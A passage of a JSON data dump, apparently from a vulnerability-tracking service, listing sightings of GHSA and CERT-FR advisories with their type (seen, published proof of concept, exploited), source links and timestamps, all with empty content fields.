"dff465b8-9dd6-409f-97f6-417fe950385f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "published-proof-of-concept", "source": "https://t.me/brutsecurity/962", "content": "", "creation_timestamp": "2026-07-11T17:00:04.312458Z"}, {"uuid": "2be26181-015f-490e-87b2-9cfc0211c15b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6g59-gm2v-qhvq", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mqf5we2xf52x", "content": "", "creation_timestamp": "2026-07-11T17:13:09.585703Z"}, {"uuid": "d9970f77-120b-4423-be5a-9395bcd68533", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rwcv-whm8-fmxm", "type": "seen", "source": "https://gist.github.com/alon710/1cf437e22a892172012205a9b0e24d57", "content": "", "creation_timestamp": "2026-07-13T17:11:49.946262Z"}, {"uuid": "87e77c35-2add-4109-ad81-b842d60c95e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7xw9-549r-8jrc", "type": "seen", "source": "https://gist.github.com/alon710/e0411f3e1cdf3980cab9ce593ae8692e", "content": "", "creation_timestamp": "2026-07-13T19:42:25.733133Z"}, {"uuid": "f6bed203-4141-4cee-a4d2-1f775407d93f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CM8G-8JFQ-887P", "type": "seen", "source": "https://t.me/GithubRedTeam/92588", "content": "", "creation_timestamp": "2026-07-13T22:00:07.146019Z"}, {"uuid": "98b75716-f3cb-4365-a203-fa755a63d607", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QV97-83W4-FF86", "type": "seen", "source": "https://t.me/GithubRedTeam/92598", "content": "", "creation_timestamp": "2026-07-13T22:00:06.903739Z"}, {"uuid": "41f33264-018a-4994-9c15-4d7d88343fd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XW9Q-2MV6-9FR8", "type": "seen", "source": "https://t.me/GithubRedTeam/92590", "content": "", "creation_timestamp": "2026-07-13T22:00:06.760271Z"}, {"uuid": "fcb21ee6-0bf4-441d-8e10-c49c201c5c25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FG23-3346-88F5", "type": "seen", "source": "https://t.me/GithubRedTeam/92599", "content": "", "creation_timestamp": "2026-07-13T22:00:06.556143Z"}, {"uuid": "2d182085-0063-4b83-9154-b5ade77731d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C2H5-PPV9-7VRQ", "type": "seen", "source": "https://t.me/GithubRedTeam/93198", "content": "", "creation_timestamp": "2026-07-13T22:00:03.842383Z"}, {"uuid": "c2180c3b-314b-467d-96cb-981e35dd6fa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4742-MR57-2R9J", "type": "published-proof-of-concept", "source": "https://t.me/securixy_kz/1275", "content": "", "creation_timestamp": "2026-07-14T00:01:03.551840Z"}, {"uuid": "c6c8af38-c906-4d12-8409-311f3108ca3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C8CC-PHH7-XMXR", "type": "published-proof-of-concept", "source": "https://t.me/securixy_kz/1231", "content": "", "creation_timestamp": "2026-07-14T00:01:03.249734Z"}, {"uuid": "adcf729c-59cb-44be-b8ab-6a2b868110a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6RF6-F9QG-8V94", "type": "exploited", "source": "https://t.me/securixy_kz/1240", "content": "", "creation_timestamp": "2026-07-14T00:01:03.184205Z"}, {"uuid": "111b5b20-0c73-47fa-9d77-aaa54c4cef0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-83QJ-6FR2-VHQG", "type": "exploited", "source": "https://t.me/securixy_kz/1136", "content": "", "creation_timestamp": "2026-07-14T00:01:01.996890Z"}, {"uuid": "cb7a8560-1a76-4f86-ad7d-6c6e28b79c1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RR6P-3PFG-562J", "type": "published-proof-of-concept", "source": "https://t.me/securixy_kz/1121", "content": "", "creation_timestamp": "2026-07-14T00:01:01.853670Z"}, {"uuid": "4969c3a5-de5b-4a9b-b1ee-6f746c2e139a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FH4V-V779-4G2W", "type": "published-proof-of-concept", "source": "https://t.me/securixy_kz/1104", "content": "", "creation_timestamp": "2026-07-14T00:01:01.631656Z"}, {"uuid": "6a3fad90-b886-4a7c-96a0-b31b5fdbfc23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-R389-865G-HCG3", "type": "seen", "source": "https://t.me/securixy_kz/1030", "content": "", "creation_timestamp": "2026-07-14T00:01:00.952627Z"}, {"uuid": "6c8d4a0c-b2fb-4b3f-b694-9e69ff38fcec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H856-FFVV-XVR4", "type": "published-proof-of-concept", "source": "https://t.me/securixy_kz/959", "content": "", "creation_timestamp": "2026-07-14T00:00:59.091160Z"}, {"uuid": "5c6a478c-6b8a-49d6-b52f-02d2a8f84b96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/securixy_kz/882", "content": "", "creation_timestamp": "2026-07-14T00:00:57.507329Z"}, {"uuid": "c9b581c8-7360-4912-b557-a37803ad8402", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-27XQ-W3JC-436C", "type": "published-proof-of-concept", "source": "https://t.me/securixy_kz/827", "content": "", "creation_timestamp": "2026-07-14T00:00:56.950699Z"}, {"uuid": "59049b31-a8c1-48d3-85ce-b68263e2633f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C7HR-448W-65PX", "type": "published-proof-of-concept", "source": "https://t.me/poxek/6193", "content": "", "creation_timestamp": "2026-07-14T00:00:48.052575Z"}, {"uuid": "3455a2f3-c7fc-4663-b265-a3c3fbf20cdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F75J-4CW6-RMX4", "type": "exploited", "source": "https://t.me/poxek/6232", "content": "", "creation_timestamp": "2026-07-14T00:00:47.986022Z"}, {"uuid": "7b06bf2c-1860-419e-94f4-f7832e007716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9hc2-hjx8-q6pv", "type": "seen", "source": "https://gist.github.com/alon710/2e36d4018e71382099203c9d78e54337", "content": "", "creation_timestamp": "2026-07-14T22:42:05.024270Z"}, {"uuid": "70b0a48f-0dc6-4bc5-bc34-8911a7b1a500", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3fv-x8vg-qqm4", "type": "seen", "source": "https://gist.github.com/alon710/94e6df27894be3cbbefd9a4426323455", "content": "", "creation_timestamp": "2026-07-14T23:12:20.042961Z"}, {"uuid": "fb83f64f-3cc3-452d-8eb7-0727df515e72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PQG7-V6WH-3PFP", "type": "seen", "source": "https://gist.github.com/alon710/5c21af8cb6d4ec1c461f4a0ac7b833d6", "content": "", "creation_timestamp": "2026-07-14T23:41:52.108196Z"}, {"uuid": "c3f0224d-33c4-4f2c-ad27-24794c773df8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2R5C-GW76-RH3W", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3290", "content": "", "creation_timestamp": "2026-07-15T00:00:35.423848Z"}, {"uuid": "af5f1ee4-f57d-4554-ac64-649211fe43f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4J6X-2764-M8GH", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3289", "content": "", "creation_timestamp": "2026-07-15T00:00:35.265929Z"}, {"uuid": "770f6f8d-7fc8-4c90-8d82-76648893896f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G2PF-XV49-M2H5", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3288", "content": "", "creation_timestamp": "2026-07-15T00:00:35.152373Z"}, {"uuid": "0dea2f08-7d2b-47d7-8412-b1fb4e258202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7QMG-GRCP-QF25", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3274", "content": "", "creation_timestamp": "2026-07-15T00:00:34.792418Z"}, {"uuid": "97b9d82e-bf92-4507-a6d7-d2563d5f8064", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-985R-Q3QP-299H", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3261", "content": "", "creation_timestamp": "2026-07-15T00:00:34.575789Z"}, {"uuid": "c1c130f8-6c5d-487c-97c2-a76b87930408", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GW94-85M2-X8V2", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3258", "content": "", "creation_timestamp": "2026-07-15T00:00:34.452835Z"}, {"uuid": "ddc3e25c-cd4e-467c-ac0b-6f2b45e60e6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HVCG-QMG6-JM4C", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3254", "content": "", "creation_timestamp": "2026-07-15T00:00:34.378360Z"}, {"uuid": "85433d57-9c19-4910-83f7-18df69ddf0e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GRP7-V8XH-RJ7H", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3248", "content": "", "creation_timestamp": "2026-07-15T00:00:34.168730Z"}, {"uuid": "a6bc8e17-8687-40f5-90f1-eadd6c2f2f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-Q4Q6-R8WH-5CGH", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3243", "content": "", "creation_timestamp": "2026-07-15T00:00:34.085797Z"}, {"uuid": "70b1f200-c02e-468a-b48f-41791ae5932e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FG23-3346-88F5", "type": "seen", "source": "https://t.me/GithubRedTeam/92599", "content": "", "creation_timestamp": "2026-07-15T00:00:33.787825Z"}, {"uuid": "2895f16f-b3c7-4ba2-b6ff-4169e79e6541", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XW9Q-2MV6-9FR8", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/92590", "content": "", "creation_timestamp": "2026-07-15T00:00:33.597519Z"}, {"uuid": "e0d5dc29-cad3-4fff-88b4-f5d115ee9555", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QV97-83W4-FF86", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/92598", "content": "", "creation_timestamp": "2026-07-15T00:00:33.500926Z"}, {"uuid": "5b168805-231b-4c86-966c-e85a7f746904", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CM8G-8JFQ-887P", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/92588", "content": "", "creation_timestamp": "2026-07-15T00:00:33.279119Z"}, {"uuid": "103c3aeb-e076-43d9-8541-1c2022bdcf58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C2H5-PPV9-7VRQ", "type": "published-proof-of-concept", "source": "Telegram/iICdo6JkqLQcGiJzEUOva0XUBnrNpqjKkG8FagtyyTeeKdc", "content": "", "creation_timestamp": "2026-07-17T00:00:08.752466Z"}, {"uuid": "493b79d7-2680-4d87-aaad-af5e9063ddc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vwjc-v7x7-cm6g", "type": "seen", "source": "https://gist.github.com/alon710/aa823e4042d20db07abf6864647f71af", "content": "", "creation_timestamp": "2026-07-17T00:31:31.663384Z"}, {"uuid": "eafe64c6-c9f9-4259-909a-88b4033a08f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-48qw-824m-86pr", "type": "seen", "source": "https://gist.github.com/alon710/aa823e4042d20db07abf6864647f71af", "content": "", "creation_timestamp": "2026-07-17T00:31:31.631433Z"}, {"uuid": "6d893636-7caf-47d8-aee3-11c2cc08dd60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CM8G-8JFQ-887P", "type": "seen", "source": "Telegram/uxGFUVPy3TOzkodNgeg8vepR-kYpq91Dg5jOn-NGrDlDjCc", "content": "", "creation_timestamp": "2026-07-17T01:00:14.137213Z"}, {"uuid": "d64e1e7b-396a-4d60-ab76-d683772614b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-FF9G-85JQ-R3G3", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3317", "content": "", "creation_timestamp": "2026-07-17T14:00:06.126966Z"}, {"uuid": "4dcd5887-4e4e-4e26-a9db-40b81d53c6c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ff9f-jf42-662q", "type": "seen", "source": "https://www.cert.at/de/warnungen/2026/7/kritische-sicherheitslucken-in-wordpress-updates-verfugbar", "content": "", "creation_timestamp": "2026-07-20T13:00:41.466134Z"}, {"uuid": "bb7c330f-a398-4650-813e-ccaa218c1d2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fpp7-x2x2-2mjf", "type": "seen", "source": "https://www.cert.at/de/warnungen/2026/7/kritische-sicherheitslucken-in-wordpress-updates-verfugbar", "content": "", "creation_timestamp": "2026-07-20T13:00:41.378885Z"}, {"uuid": "0e285bee-216d-4198-b337-63f787d07324", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6Q95-FCWC-4H44", "type": "seen", "source": "https://t.me/bdufstecru/3329", "content": "", "creation_timestamp": "2026-07-20T15:00:03.370746Z"}, {"uuid": "95623643-9f7a-46de-8e36-c313321c4583", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6jxm-fv7w-rw5j", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3mr3urupfyo2u", "content": "", "creation_timestamp": "2026-07-20T18:00:49.264107Z"}, {"uuid": "05772ceb-35b4-41af-903b-2d5c2c7f15fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42H9-826W-CGV3", "type": "seen", "source": "https://gist.github.com/alon710/cdf2a5ef96b6a707eafe65a3f00899a3", "content": "", "creation_timestamp": "2026-07-20T18:32:13.622296Z"}, {"uuid": "44fb1765-d6d1-482e-99de-f8a793741d4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gcjp-f7jm-rrrg", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mr3y5jeb5l2e", "content": "", "creation_timestamp": "2026-07-20T19:01:01.294055Z"}, {"uuid": "4a888dda-3b44-49b0-b4f4-1479231e575e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xcmw-grxf-wjhj", "type": "seen", "source": "https://bsky.app/profile/euvd-bot.bsky.social/post/3mr6ilj3l562e", "content": "", "creation_timestamp": "2026-07-21T19:00:30.212878Z"}, {"uuid": "782527c8-e49f-4c60-9096-c7fa08a9a943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pjwm-rvh2-c87w", "type": "seen", "source": "https://github.blog/security/supply-chain-security/the-case-for-a-cooldown-why-dependabot-now-waits-before-issuing-version-updates/", "content": "", "creation_timestamp": "2026-07-24T01:00:50.122396Z"}, {"uuid": "379f151e-0b2d-49ee-b708-dcab543c8edd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fw8c-xr5c-95f9", "type": "seen", "source": "https://github.blog/security/supply-chain-security/the-case-for-a-cooldown-why-dependabot-now-waits-before-issuing-version-updates/", "content": "", "creation_timestamp": "2026-07-24T01:00:50.065749Z"}, {"uuid": "562cfc02-7253-4f0f-8170-f257086d0d86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jcxm-7wvp-g6p5", "type": "seen", "source": "https://github.blog/security/supply-chain-security/the-case-for-a-cooldown-why-dependabot-now-waits-before-issuing-version-updates/", "content": "", "creation_timestamp": "2026-07-24T01:00:49.976941Z"}, {"uuid": "53b4b00f-8e07-4275-8671-58b147fa838d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-44JH-J22R-33WQ", "type": "seen", "source": "https://t.me/EchelonEyes/1200", "content": "", "creation_timestamp": "2026-07-26T02:02:30.179652Z"}, {"uuid": "ad9ca945-a313-4721-9c89-ab48b9218e44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M2QF-HXJV-5GPQ", "type": "seen", "source": "https://t.me/EchelonEyes/1499", "content": "", "creation_timestamp": "2026-07-26T02:02:27.018670Z"}, {"uuid": "faec03ed-e1a1-4fe2-a843-2495cf4cc535", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2RMR-XW8M-22Q9", "type": "seen", "source": "https://t.me/EchelonEyes/2145", "content": "", "creation_timestamp": "2026-07-26T02:02:19.223595Z"}, {"uuid": "e638b93d-72b7-4569-b1bc-8359aafdfb9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5PW9-F9R4-MV2R", "type": "seen", "source": "https://t.me/EchelonEyes/2791", "content": "", "creation_timestamp": "2026-07-26T02:02:09.332078Z"}, {"uuid": "bf6175bb-63e1-4c7f-8332-05ee5079fec8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VJH7-7G9H-FJFH", "type": "seen", "source": "https://t.me/EchelonEyes/3678", "content": "", "creation_timestamp": "2026-07-26T02:00:32.244098Z"}, {"uuid": "568683a4-23fb-4f10-971e-435a3ba680bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4742-MR57-2R9J", "type": "seen", "source": "https://t.me/cyberwarehouse/1047", "content": "", "creation_timestamp": "2026-07-26T02:00:07.025400Z"}, {"uuid": "a2e0b0ed-8732-47cb-a5e1-f042bf7b7b61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m5m2-mrxf-7j7q", "type": "seen", "source": "https://gist.github.com/Correctover/e98078382935c28832271fc5a8e21606", "content": "", "creation_timestamp": "2026-07-27T11:51:46.740466Z"}, {"uuid": "1d2b6edd-5361-4844-91db-443c0cba448d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6m8f-w97w-99h7", "type": "seen", "source": "https://gist.github.com/Correctover/e98078382935c28832271fc5a8e21606", "content": "", "creation_timestamp": "2026-07-27T11:51:46.714723Z"}, {"uuid": "8b7eddf8-50e1-45a2-9c75-a85dc5460b76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-625j-rw87-4ghr", "type": "seen", "source": "https://gist.github.com/Correctover/e98078382935c28832271fc5a8e21606", "content": "", "creation_timestamp": "2026-07-27T11:51:46.686850Z"}, {"uuid": "7b7e75eb-d2e6-4e7c-b872-2b8370854039", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6pq5-p7fc-7xhq", "type": "seen", "source": "https://gist.github.com/Correctover/e98078382935c28832271fc5a8e21606", "content": "", "creation_timestamp": "2026-07-27T11:51:46.658768Z"}, {"uuid": "0ec8eca8-5b14-4ae5-8631-e4c43384ab0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-29w2-fq35-v728", "type": "seen", "source": "https://gist.github.com/Correctover/e98078382935c28832271fc5a8e21606", "content": "", "creation_timestamp": "2026-07-27T11:51:46.631866Z"}, {"uuid": "2af839c4-a2fa-4820-845b-317fe68f70ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g879-4j4f-6vj7", "type": "seen", "source": "https://gist.github.com/Correctover/e98078382935c28832271fc5a8e21606", "content": "", "creation_timestamp": "2026-07-27T11:51:46.606653Z"}, {"uuid": "6b85737f-e1e1-411a-b7ba-53ce28996765", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-032", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116992001998966808", "content": "", "creation_timestamp": "2026-07-27T12:44:48.599980Z"}, {"uuid": "0a84d0d7-96b5-4c0a-bf6a-44d72a7e95f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-032", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mrmwf2trmd27", "content": "", "creation_timestamp": "2026-07-27T12:44:42.760933Z"}, {"uuid": "237e018a-5adb-4a93-9f0d-4d55377f84c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-032", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mrmzbbeoiw2b", "content": "", "creation_timestamp": "2026-07-27T13:36:16.511971Z"}, {"uuid": "52cb762a-bb74-4a7f-99bd-92cdc1b0f3cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RCQ7-RV5G-J3R4", "type": "seen", "source": "https://t.me/bdufstecru/3344", "content": "", "creation_timestamp": "2026-07-27T16:00:06.387433Z"}, {"uuid": "664d1b68-3cc6-4e71-aff1-1e1890fb2005", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-93WV-JW9V-4972", "type": "seen", "source": "https://t.me/bdufstecru/3345", "content": "", "creation_timestamp": "2026-07-27T16:00:06.273797Z"}, {"uuid": "f7c85fb1-6cd1-4cf1-a016-e57411aab266", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gv7g-jm28-cr3m", "type": "seen", "source": "https://bsky.app/profile/suriq.io/post/3mrnefsqhi72u", "content": "", "creation_timestamp": "2026-07-27T16:55:41.014755Z"}, {"uuid": "eec1971e-0aeb-4353-8ea2-04c2f6d1d017", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x5vx-c2c8-m3w9", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mrnmis3k5v2n", "content": "", "creation_timestamp": "2026-07-27T19:20:30.128113Z"}, {"uuid": "a7858398-ed42-47f9-a6d9-19a4e553d337", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8359-h9fx-j6v9", "type": "seen", "source": "https://gist.github.com/alon710/d0f3f961aeff39e79a8edafcd7786784", "content": "", "creation_timestamp": "2026-07-29T10:31:22.400431Z"}, {"uuid": 